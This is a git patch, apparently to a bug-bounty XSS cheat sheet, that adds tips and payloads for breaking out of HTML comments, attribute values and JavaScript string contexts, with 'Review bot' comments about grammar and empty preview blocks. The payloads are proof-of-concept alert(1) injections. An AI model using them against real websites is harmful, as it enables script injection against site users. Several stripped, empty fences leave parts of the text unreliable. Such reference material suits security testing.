From 203e78791aa3afbf334796f15069c9849439e631 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Mon, 14 Sep 2020 09:27:09 +0700
Subject: [PATCH] XSS [2]
Add 2 tips and add the preview of the source code after inputting the payloads
---
XSS.md | 73 +++++++++++++++++++++++++++++++++++++++++++++++++++++++---
1 file changed, 70 insertions(+), 3 deletions(-)
diff --git a/XSS.md b/XSS.md
index 2f8e976..681fa72 100644
--- a/XSS.md
+++ b/XSS.md
@@ -17,6 +17,11 @@
```
+* After input the payload
+```html
+
+```
+
3. Add --> to escape the payload if input lands in HTML comments.
```html
-->
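Review bot: the new bullet `* After input the payload` should read `* After inputting the payload` (the same wording is repeated for every tip in this patch, so fix it everywhere in one pass), and the preview fence that follows it is empty in the diff as shown, so the reader sees no rendered source at all; if the HTML was stripped when the file was saved, restore it, otherwise drop the empty fence rather than ship a blank preview.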
@@ -27,6 +32,11 @@
```
+* After input the payload
+```html
+ -->
+```
+
4. Add when the input inside or between opening/closing tags, tag can be , and any other HTML tags
```html
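Review bot: the preview block added here contains only ` -->` (with a leading space and nothing before it), so it does not show where the comment terminator lands relative to the surrounding markup that tip 3 talks about; either include the surrounding source lines the tip refers to or state in the bullet that this is a fragment of the rendered page. The bullet title has the same `After input` grammar slip as the rest of the patch.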
@@ -38,10 +48,15 @@
1
```
+* After input the payload
+```html
+">1
+```
+
5. Use when input inside an attribute’s value of an HTML tag but > is filtered
```html
-"onmouseover=alert(1)
-"autofocus onfocus=alert(1)
+" onmouseover=alert(1)
+" autofocus onfocus=alert(1)
```
* Example source code
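Review bot: the substantive change in this hunk is the space inserted between the closing quote and the attribute name in both tip 5 lines (`"onmouseover=alert(1)` becomes `" onmouseover=alert(1)`, and likewise for the `autofocus` line), yet the commit message only mentions adding tips and previews; say in the message that tip 5 was corrected, so readers of the history do not take it for a whitespace-only edit. The preview `">1` also looks truncated compared with the lines it is meant to illustrate, so check that it survived saving intact.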
@@ -49,6 +64,11 @@
```
+* After input the payload
+```html
+
+```
+
6. Use when input inside
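Review bot: the `After input the payload` fence added for tip 5 is empty as shown, and the trailing context line `6. Use when input inside` is an unfinished sentence, so the reader gets neither a preview for tip 5 nor a readable lead into tip 6; fill in the preview or remove the empty fence, and finish the tip 6 heading while you are editing this area.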
@@ -57,7 +77,54 @@
* Example source code
```html
+```
+
+* After input the payload
+```html
+alert(1)';
+
+```
+
+7. Use when input lands in a script block, inside a string delimited value.
+```html
+'-alert(1)-'
+'/alert(1)//
+```
+
+* Example source code
+```html
+
+```
+
+* After input the payload
+```html
+
+```
+
+8. Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash.
+```html
+\'alert(1)//
+```
+
+* If we input payload '-alert(1)-' it will be like this
+```html
+
+```
+The quotes are escaped by a backslash so we need to bypass them
+
+* After input the payload
+```html
+
```
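Review bot: the fences for tips 7 and 8 are tagged `html` although their contents (`'-alert(1)-'`, `'/alert(1)//`, `\'alert(1)//` and the preview line `alert(1)';`) are JavaScript inside a script block, so tag them `javascript` so they highlight correctly. Several of the new preview blocks are empty in the diff as shown (the `Example source code` and `After input the payload` blocks for tip 7, and the `If we input payload` and `After input the payload` blocks for tip 8), which leaves the sentence `The quotes are escaped by a backslash so we need to bypass them` with nothing to refer to; and the hunk's first added line is a closing fence placed directly after the context opening `html` fence of tip 6's `Example source code`, so that block is now empty as well. Also, `Same like Number 7` should read `Same as tip 7`, and `If we input payload '-alert(1)-' it will be like this` should read `If we input the payload '-alert(1)-', the source looks like this`.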